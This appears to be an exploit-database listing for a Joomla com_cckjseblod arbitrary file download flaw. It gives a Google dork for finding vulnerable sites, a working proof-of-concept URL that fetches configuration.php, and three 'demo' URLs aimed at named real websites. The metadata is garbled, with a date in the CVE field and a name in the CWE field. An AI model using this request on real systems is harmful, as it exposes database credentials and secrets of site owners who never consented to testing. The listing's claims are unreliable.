Joomla com_cckjseblod Config File Download Vulnerability

2016.09.16
ir Saman.khan (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: 2016-09-13
CWE: Saman-Khan

########################## # Exploit Title: Joomla Config File Download Vulnerability # Google Dork : inurl:option=com_cckjseblod # We Are Iranian Anonymous # Home: Iranonymous.org # Discovered By: Hacker Khan # Tested on : Windows # Version : all ########################## # Poc : http://site.com//index.php?option=com_cckjseblod&task=download&file=configuration.php ########################## # {DEMO} http://www.siancoeg.com/index.php?option=com_cckjseblod&task=download&file=configuration.php http://www.rockmyrun.com/index.php?option=com_cckjseblod&task=download&file=configuration.php http://www.waterco.com.au/index.php?option=com_cckjseblod&task=download&file=configuration.php ################################### #Thanks to : MR.Khatar || ll_azab-siyah_ll || Blackwolf_Iran ||Ormazd ||Sh@d0w ||mohammad Pn ||Shdmehr || And All Of Iranian Anonymous . # Discovered By: Hacker Khan


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top